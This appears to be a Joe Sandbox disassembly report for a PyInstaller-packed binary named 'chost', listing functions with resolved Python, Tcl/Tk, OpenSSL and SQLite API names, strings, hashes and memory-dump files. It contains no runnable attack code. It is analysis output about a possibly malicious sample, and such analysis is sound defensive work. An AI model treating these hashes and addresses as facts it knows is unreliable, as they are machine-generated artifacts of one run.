API String ID: 3568877910-446233508
Opcode ID: fa1fb7101f3f476e7f0c3d6d4dcd00bc7968ab7eed5c18ac657f84400f9b10b7
Instruction ID: 2d335410330028bfa3052a323e4bc7bc4221b028f4a9b97edaf8afa9b8e02cdb
Opcode Fuzzy Hash: fa1fb7101f3f476e7f0c3d6d4dcd00bc7968ab7eed5c18ac657f84400f9b10b7
Instruction Fuzzy Hash: 17D16061B0CA4281FB54EA229961BBE72ADEF84BC8F640035DD2D47EDEDF2DE5418740

Function 00007FF694365820 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365830
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365842
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365879
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436588B
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658A4
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658B6
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658CF
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658E1
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943658FD
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436590F
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436592B
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436593D
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365959
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF69436596B
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365987
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF694365999
GetProcAddress.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943659B5
GetLastError.KERNEL32(?,00007FF6943664BF,?,00007FF69436336E), ref: 00007FF6943659C7

Strings

PyRun_SimpleStringFlags, xrefs: 00007FF694365DFB, 00007FF694365E1D
PyObject_CallFunctionObjArgs, xrefs: 00007FF694365D15, 00007FF694365D37
PyUnicode_Decode, xrefs: 00007FF694365EE1, 00007FF694365F03
PyConfig_Clear, xrefs: 00007FF69436597D, 00007FF69436599F
PyImport_AddModule, xrefs: 00007FF694365BD3, 00007FF694365BF5
PySys_GetObject, xrefs: 00007FF694365E57, 00007FF694365E79
Py_InitializeFromConfig, xrefs: 00007FF6943658F3, 00007FF694365915
PyUnicode_FromString, xrefs: 00007FF694365F6B, 00007FF694365F8D
PyErr_NormalizeException, xrefs: 00007FF694365AED, 00007FF694365B0F
PyObject_SetAttrString, xrefs: 00007FF694365D71, 00007FF694365D93
PyErr_Restore, xrefs: 00007FF694365B77, 00007FF694365B99
PyConfig_InitIsolatedConfig, xrefs: 00007FF6943659AB, 00007FF6943659CD
PyMarshal_ReadObjectFromString, xrefs: 00007FF694365C5D, 00007FF694365C7F
Py_Finalize, xrefs: 00007FF6943658C5, 00007FF6943658E7
PyConfig_SetWideStringList, xrefs: 00007FF694365A63, 00007FF694365A85
GetProcAddress, xrefs: 00007FF694365858
Py_DecRef, xrefs: 00007FF694365826, 00007FF694365848
PyConfig_SetString, xrefs: 00007FF694365A35, 00007FF694365A57
PyUnicode_FromFormat, xrefs: 00007FF694365F3D, 00007FF694365F5F
Py_DecodeLocale, xrefs: 00007FF69436586F, 00007FF694365891
PyImport_ExecCodeModule, xrefs: 00007FF694365C01, 00007FF694365C23
PyConfig_SetBytesString, xrefs: 00007FF694365A07, 00007FF694365A29
Py_ExitStatusException, xrefs: 00007FF69436589A, 00007FF6943658BC
PyErr_Print, xrefs: 00007FF694365B49, 00007FF694365B6B
PyUnicode_Join, xrefs: 00007FF694365F99, 00007FF694365FBB
PyConfig_Read, xrefs: 00007FF6943659D9, 00007FF6943659FB
PyModule_GetDict, xrefs: 00007FF694365CB9, 00007FF694365CDB
PyStatus_Exception, xrefs: 00007FF694365E29, 00007FF694365E4B
PyUnicode_DecodeFSDefault, xrefs: 00007FF694365F0F, 00007FF694365F31
Py_PreInitialize, xrefs: 00007FF69436594F, 00007FF694365971
Py_IsInitialized, xrefs: 00007FF694365921, 00007FF694365943
PyImport_ImportModule, xrefs: 00007FF694365C2F, 00007FF694365C51
PySys_SetObject, xrefs: 00007FF694365E85, 00007FF694365EA7
PyObject_GetAttrString, xrefs: 00007FF694365D43, 00007FF694365D65
PyErr_Clear, xrefs: 00007FF694365A91, 00007FF694365AB3
PyErr_Occurred, xrefs: 00007FF694365B1B, 00007FF694365B3D
PyUnicode_AsUTF8, xrefs: 00007FF694365EB3, 00007FF694365ED5
PyMem_RawFree, xrefs: 00007FF694365C8B, 00007FF694365CAD
PyObject_CallFunction, xrefs: 00007FF694365CE7, 00007FF694365D09
PyUnicode_Replace, xrefs: 00007FF694365FC7, 00007FF694365FE9
PyErr_Fetch, xrefs: 00007FF694365ABF, 00007FF694365AE1
PyObject_Str, xrefs: 00007FF694365D9F, 00007FF694365DC1
Failed to get address for %hs, xrefs: 00007FF694365851
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF694365DCD, 00007FF694365DEF
PyEval_EvalCode, xrefs: 00007FF694365BA5, 00007FF694365BC7

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$PyConfig_Clear$PyConfig_InitIsolatedConfig$PyConfig_Read$PyConfig_SetBytesString$PyConfig_SetString$PyConfig_SetWideStringList$PyErr_Clear$PyErr_Fetch$PyErr_NormalizeException$PyErr_Occurred$PyErr_Print$PyErr_Restore$PyEval_EvalCode$PyImport_AddModule$PyImport_ExecCodeModule$PyImport_ImportModule$PyMarshal_ReadObjectFromString$PyMem_RawFree$PyModule_GetDict$PyObject_CallFunction$PyObject_CallFunctionObjArgs$PyObject_GetAttrString$PyObject_SetAttrString$PyObject_Str$PyPreConfig_InitIsolatedConfig$PyRun_SimpleStringFlags$PyStatus_Exception$PySys_GetObject$PySys_SetObject$PyUnicode_AsUTF8$PyUnicode_Decode$PyUnicode_DecodeFSDefault$PyUnicode_FromFormat$PyUnicode_FromString$PyUnicode_Join$PyUnicode_Replace$Py_DecRef$Py_DecodeLocale$Py_ExitStatusException$Py_Finalize$Py_InitializeFromConfig$Py_IsInitialized$Py_PreInitialize
API String ID: 199729137-653951865
Opcode ID: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction ID: 3a5623702a2c4a47feeda6c6c4281f3a1de03cf2bc08da220e03fc71c303ca39
Opcode Fuzzy Hash: 3ca4f2c8e8fa74ff45c561f9825c8e8d27386d4e804e1314c270c66bff6859f6
Instruction Fuzzy Hash: 9A22B564A49B0781FA39DB77B8E557472A0EF14791F54D4BDD81EC2BA0EF3CA548D200

Function 00007FF6943676B0 Relevance: 177.1, APIs: 66, Strings: 35, Instructions: 314libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32 ref: 00007FF6943676C7
GetLastError.KERNEL32 ref: 00007FF6943676D9
GetProcAddress.KERNEL32 ref: 00007FF694367715
GetLastError.KERNEL32 ref: 00007FF694367727
GetProcAddress.KERNEL32 ref: 00007FF694367740
GetLastError.KERNEL32 ref: 00007FF694367752
GetProcAddress.KERNEL32 ref: 00007FF69436776B
GetLastError.KERNEL32 ref: 00007FF69436777D
GetProcAddress.KERNEL32 ref: 00007FF694367799
GetLastError.KERNEL32 ref: 00007FF6943677AB
GetProcAddress.KERNEL32 ref: 00007FF6943677C7
GetLastError.KERNEL32 ref: 00007FF6943677D9
GetProcAddress.KERNEL32 ref: 00007FF6943677F5
GetLastError.KERNEL32 ref: 00007FF694367807
GetProcAddress.KERNEL32 ref: 00007FF694367823
GetLastError.KERNEL32 ref: 00007FF694367835
GetProcAddress.KERNEL32 ref: 00007FF694367851
GetLastError.KERNEL32 ref: 00007FF694367863

Strings

Tcl_MutexFinalize, xrefs: 00007FF6943678FF, 00007FF694367921
Tcl_ThreadQueueEvent, xrefs: 00007FF6943679B7, 00007FF6943679D9
Tcl_SetVar2, xrefs: 00007FF694367A41, 00007FF694367A63
Tcl_JoinThread, xrefs: 00007FF694367875, 00007FF694367897
Tcl_NewStringObj, xrefs: 00007FF694367ACB, 00007FF694367AED
Tcl_EvalObjv, xrefs: 00007FF694367BDF, 00007FF694367C01
Tcl_GetCurrentThread, xrefs: 00007FF694367847, 00007FF694367869
Tcl_ConditionFinalize, xrefs: 00007FF69436792D, 00007FF69436794F
Tk_Init, xrefs: 00007FF694367C69, 00007FF694367C8B
GetProcAddress, xrefs: 00007FF6943676EF
Tcl_Init, xrefs: 00007FF6943676C0, 00007FF6943676DF
Tcl_Finalize, xrefs: 00007FF69436778F, 00007FF6943677B1
Tcl_ConditionNotify, xrefs: 00007FF69436795B, 00007FF69436797D
Tcl_Alloc, xrefs: 00007FF694367C0D, 00007FF694367C2F
Tcl_CreateThread, xrefs: 00007FF694367819, 00007FF69436783B
Tcl_GetString, xrefs: 00007FF694367A9D, 00007FF694367ABF
Tcl_FinalizeThread, xrefs: 00007FF6943677BD, 00007FF6943677DF
Tcl_CreateInterp, xrefs: 00007FF69436770B, 00007FF69436772D
Tcl_SetVar2Ex, xrefs: 00007FF694367B27, 00007FF694367B49
Tcl_MutexUnlock, xrefs: 00007FF6943678D1, 00007FF6943678F3
Tcl_GetVar2, xrefs: 00007FF694367A13, 00007FF694367A35
Tcl_EvalFile, xrefs: 00007FF694367B83, 00007FF694367BA5
Tcl_FindExecutable, xrefs: 00007FF694367736, 00007FF694367758
Tcl_DeleteInterp, xrefs: 00007FF6943677EB, 00007FF69436780D
Tcl_NewByteArrayObj, xrefs: 00007FF694367AF9, 00007FF694367B1B
Tcl_MutexLock, xrefs: 00007FF6943678A3, 00007FF6943678C5
Tcl_ConditionWait, xrefs: 00007FF694367989, 00007FF6943679AB
Tcl_GetObjResult, xrefs: 00007FF694367B55, 00007FF694367B77
Tcl_EvalEx, xrefs: 00007FF694367BB1, 00007FF694367BD3
Tcl_CreateObjCommand, xrefs: 00007FF694367A6F, 00007FF694367A91
Tcl_Free, xrefs: 00007FF694367C3B, 00007FF694367C5D
Tcl_ThreadAlert, xrefs: 00007FF6943679E5, 00007FF694367A07
Tcl_DoOneEvent, xrefs: 00007FF694367761, 00007FF694367783
Failed to get address for %hs, xrefs: 00007FF6943676E8
Tk_GetNumMainWindows, xrefs: 00007FF694367C97, 00007FF694367CB9

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: AddressErrorLastProc
String ID: Failed to get address for %hs$GetProcAddress$Tcl_Alloc$Tcl_ConditionFinalize$Tcl_ConditionNotify$Tcl_ConditionWait$Tcl_CreateInterp$Tcl_CreateObjCommand$Tcl_CreateThread$Tcl_DeleteInterp$Tcl_DoOneEvent$Tcl_EvalEx$Tcl_EvalFile$Tcl_EvalObjv$Tcl_Finalize$Tcl_FinalizeThread$Tcl_FindExecutable$Tcl_Free$Tcl_GetCurrentThread$Tcl_GetObjResult$Tcl_GetString$Tcl_GetVar2$Tcl_Init$Tcl_JoinThread$Tcl_MutexFinalize$Tcl_MutexLock$Tcl_MutexUnlock$Tcl_NewByteArrayObj$Tcl_NewStringObj$Tcl_SetVar2$Tcl_SetVar2Ex$Tcl_ThreadAlert$Tcl_ThreadQueueEvent$Tk_GetNumMainWindows$Tk_Init
API String ID: 199729137-3427451314
Opcode ID: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction ID: d6d34ffba79c9cf7b9ae432525aacaa44dc78855b73e51e0693e33ab5c1dc0a1
Opcode Fuzzy Hash: 0a662de07e299f73dada83b080b335429a490c7fb48c0bc5bb894b33d2b2cc2e
Instruction Fuzzy Hash: AE029264A1DB0792FA35DB77A8D59B8B2A1EF04765B9481BDD41EC23A0EF3CB548C210

Function 00007FF6943681C0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF694369400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF6943645E4,00000000,00007FF694361985), ref: 00007FF694369439

ExpandEnvironmentStringsW.KERNEL32(?,00007FF6943688A7,?,?,00000000,00007FF694363CBB), ref: 00007FF69436821C

Part of subcall function 00007FF694362810: MessageBoxW.USER32 ref: 00007FF6943628EA

Strings

CreateDirectory, xrefs: 00007FF69436836C
LOADER: failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF694368230
\, xrefs: 00007FF694368251
LOADER: failed to create runtime-tmpdir path %ls!, xrefs: 00007FF694368363
%.*s, xrefs: 00007FF6943682FC
LOADER: failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF6943681F3
LOADER: failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF6943682C9
LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!, xrefs: 00007FF69436828D

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
API String ID: 1662231829-930877121
Opcode ID: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction ID: 19881956d4b0b640426b40011f359a08836b6217a42781f4b400ced101d51cec
Opcode Fuzzy Hash: 6e1db7188d29f55993033d39f9d092d149d7f4b46b4bc38197dd47a6e93f4cef
Instruction Fuzzy Hash: 7A51A461A2D64381FB74AB37E8D26BA7260EF98784F54C579E90EC26D5EE2CE404C740

Function 00007FF694361600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON

Download Yara Rule

Strings

fseek, xrefs: 00007FF6943616E1
Failed to extract %s: failed to seek to the entry's data!, xrefs: 00007FF6943616DA
Failed to extract %s: failed to open archive file!, xrefs: 00007FF6943616A2
fwrite, xrefs: 00007FF6943617D1
Failed to create symbolic link %s!, xrefs: 00007FF694361622
fread, xrefs: 00007FF6943617E6
Failed to extract %s: failed to read data chunk!, xrefs: 00007FF6943617DF
Failed to extract %s: failed to open target file!, xrefs: 00007FF69436165C
malloc, xrefs: 00007FF694361749
fopen, xrefs: 00007FF694361663
Failed to extract %s: failed to write data chunk!, xrefs: 00007FF6943617CA
Failed to extract %s: failed to allocate temporary buffer!, xrefs: 00007FF694361742

Memory Dump Source

Source File: 00000011.00000002.2378009290.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true

Associated: 00000011.00000002.2377965928.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378055331.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378097948.00007FF6943A1000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000011.00000002.2378173173.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ff694360000_chost.jbxd

Similarity

API ID: CurrentProcess
String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
API String ID: 2050909247-1550345328
Opcode ID: adf16c7f5dd5dd042311f1e31ba3bd6dccb0c0644cb101887f07de4289785f5f
Instruction ID: 9a114c3843bf75e5076c0475f8d657baff8be09ddb9392e7641fcb66bdde48c1
Opcode Fuzzy Hash: adf16c7f5dd5dd042311f1e31ba3bd6dccb0c0644cb101887f07de4289785f5f
Instruction Fuzzy Hash: F7518C21B0864792EA30AB33A4821A973A0FF84798F84C5B9EE4CC7796DE3CF555C740

Function 00007FFDF6A55880 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 101COMMON

Download Yara Rule

APIs

00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF6A558B8
00007FFE1FFB6570.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFDF6A558E9

Strings

..\s\ssl\ssl_ciph.c, xrefs: 00007FFDF6A55995
ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFDF6A559D1
SUITEB128, xrefs: 00007FFDF6A5590F
SUITEB128ONLY, xrefs: 00007FFDF6A558A6
check_suiteb_cipher_list, xrefs: 00007FFDF6A55989
SUITEB192, xrefs: 00007FFDF6A5593D
ECDHE-ECDSA-AES128-GCM-SHA256, xrefs: 00007FFDF6A559F4
SUITEB128C2, xrefs: 00007FFDF6A558DC
ECDHE-ECDSA-AES256-GCM-SHA384, xrefs: 00007FFDF6A559D8, 00007FFDF6A559E8

Memory Dump Source

Source File: 00000011.00000002.2378751077.00007FFDF6A41000.00000040.00000001.01000000.0000001B.sdmp, Offset: 00007FFDF6A40000, based on PE: true

Associated: 00000011.00000002.2378710820.00007FFDF6A40000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC3000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AC5000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AED000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6AF8000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2378751077.00007FFDF6B03000.00000040.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379034636.00007FFDF6B07000.00000080.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000011.00000002.2379155081.00007FFDF6B09000.00000004.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf6a40000_chost.jbxd

Similarity

API ID: 00007B6570
String ID: ..\s\ssl\ssl_ciph.c$ECDHE-ECDSA-AES128-GCM-SHA256$ECDHE-ECDSA-AES128-GCM-SHA256:ECDHE-ECDSA-AES256-GCM-SHA384$ECDHE-ECDSA-AES256-GCM-SHA384$SUITEB128$SUITEB128C2$SUITEB128ONLY$SUITEB192$check_suiteb_cipher_list
API String ID: 4069847057-1099454403
Opcode ID: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
Instruction ID: 969930797a27a8247e1ba2a4ae5ed78f46e84760c045a3679cf95c6b6809bb6c
Opcode Fuzzy Hash: d010dc04cde0d827dd4d4b2974a89dd33488d398655083e96dacdbd8a206bc00
Instruction Fuzzy Hash: 74416076B18A4696EB10DB21E860B7877A8EF44794F404535DA2E87ED9EF3CE950CB00

Function 00007FFDF71047D0 Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 227COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDF709D940: 00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF709DAE7

Part of subcall function 00007FFDF709D440: 00007FFE0E142010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDF7097857), ref: 00007FFDF709D59A
Part of subcall function 00007FFDF709D440: 00007FFE0E142010.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,00007FFDF7097857), ref: 00007FFDF709D617

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF7104B42

Strings

row_number, xrefs: 00007FFDF7104917
lag, xrefs: 00007FFDF710497A
rank, xrefs: 00007FFDF710493C
ntile, xrefs: 00007FFDF7104964
cume_dist, xrefs: 00007FFDF7104959
RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression, xrefs: 00007FFDF71048D4
percent_rank, xrefs: 00007FFDF710494E
L, xrefs: 00007FFDF710492D
dense_rank, xrefs: 00007FFDF7104926
FILTER clause may only be used with aggregate window functions, xrefs: 00007FFDF71048FF
lead, xrefs: 00007FFDF710496F

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: FILTER clause may only be used with aggregate window functions$L$RANGE with offset PRECEDING/FOLLOWING requires one ORDER BY expression$cume_dist$dense_rank$lag$lead$ntile$percent_rank$rank$row_number
API String ID: 2636501453-2234786739
Opcode ID: 7f78d3a1e1e00efc653da4ffb875c65d86f2ba1fc8abed2fb87603ddfbabf6f9
Instruction ID: 3449da0df1c9aa73ef1051274216d64cb20f6146addcfc820fc25228c6c74eec
Opcode Fuzzy Hash: 7f78d3a1e1e00efc653da4ffb875c65d86f2ba1fc8abed2fb87603ddfbabf6f9
Instruction Fuzzy Hash: E1B18B7BB08B818AE720CF65D4A0AAE37B1EB49788F145235DE6C077C9DB38D169C744

Function 00007FFDF70CD710 Relevance: 17.9, APIs: 1, Strings: 9, Instructions: 386COMMON

Download Yara Rule

Strings

%s.%s, xrefs: 00007FFDF70CD7DC
error during initialization: %s, xrefs: 00007FFDF70CDAD6
_init, xrefs: 00007FFDF70CDA0E
sqlite3_extension_init, xrefs: 00007FFDF70CD79A
unable to open shared library [%.*s], xrefs: 00007FFDF70CDD1F
lib, xrefs: 00007FFDF70CD961
no entry point [%s] in shared library [%s], xrefs: 00007FFDF70CDBAC
not authorized, xrefs: 00007FFDF70CD783
sqlite3_, xrefs: 00007FFDF70CD913

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID:
String ID: %s.%s$_init$error during initialization: %s$lib$no entry point [%s] in shared library [%s]$not authorized$sqlite3_$sqlite3_extension_init$unable to open shared library [%.*s]
API String ID: 0-3733955532
Opcode ID: 7d86690b2a26f4a71fa6ff1b7e2b001420425af829b9134edd93df11bd6897cd
Instruction ID: ad6eb8d4398c4da408290c470c4edb7493c196cdef7d1d79c4f9f89231c48120
Opcode Fuzzy Hash: 7d86690b2a26f4a71fa6ff1b7e2b001420425af829b9134edd93df11bd6897cd
Instruction Fuzzy Hash: DA029E6AF09A8285EB158B25E474BF963B0EF45B80F085135DE6E867D8DF3CE458E340

Function 00007FFDF70A7830 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 327COMMON

Download Yara Rule

APIs

00007FFE0E142010.VCRUNTIME140 ref: 00007FFDF70A7BA2

Strings

UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q, xrefs: 00007FFDF70A7BE4
SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE, xrefs: 00007FFDF70A7D2C
Cannot add a PRIMARY KEY column, xrefs: 00007FFDF70A7951
Cannot add a NOT NULL column with default value NULL, xrefs: 00007FFDF70A79DF
cannot add a STORED column, xrefs: 00007FFDF70A7B42
Cannot add a UNIQUE column, xrefs: 00007FFDF70A796C
Cannot add a REFERENCES column with non-NULL default value, xrefs: 00007FFDF70A79BD
SELECT raise(ABORT,%Q) FROM "%w"."%w", xrefs: 00007FFDF70A79C7, 00007FFDF70A7A43, 00007FFDF70A7B51
Cannot add a column with non-constant default, xrefs: 00007FFDF70A7A39

Memory Dump Source

Source File: 00000011.00000002.2382752356.00007FFDF7051000.00000040.00000001.01000000.00000016.sdmp, Offset: 00007FFDF7050000, based on PE: true

Associated: 00000011.00000002.2382708573.00007FFDF7050000.00000002.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B2000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71B4000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2382752356.00007FFDF71C9000.00000040.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383046562.00007FFDF71CB000.00000080.00000001.01000000.00000016.sdmpDownload File
Associated: 00000011.00000002.2383085811.00007FFDF71CC000.00000004.00000001.01000000.00000016.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_7ffdf7050000_chost.jbxd

Similarity

API ID: 00007E142010
String ID: Cannot add a NOT NULL column with default value NULL$Cannot add a PRIMARY KEY column$Cannot add a REFERENCES column with non-NULL default value$Cannot add a UNIQUE column$Cannot add a column with non-constant default$SELECT CASE WHEN quick_check GLOB 'CHECK*' THEN raise(ABORT,'CHECK constraint failed') WHEN quick_check GLOB 'non-* value in*' THEN raise(ABORT,'type mismatch on DEFAULT') ELSE raise(ABORT,'NOT NULL constraint failed') END FROM pragma_quick_check(%Q,%Q) WHERE$SELECT raise(ABORT,%Q) FROM "%w"."%w"$UPDATE "%w".sqlite_master SET sql = printf('%%.%ds, ',sql) || %Q || substr(sql,1+length(printf('%%.%ds',sql))) WHERE type = 'table' AND name = %Q$cannot add a STORED column
API String ID: 2636501453-200680935
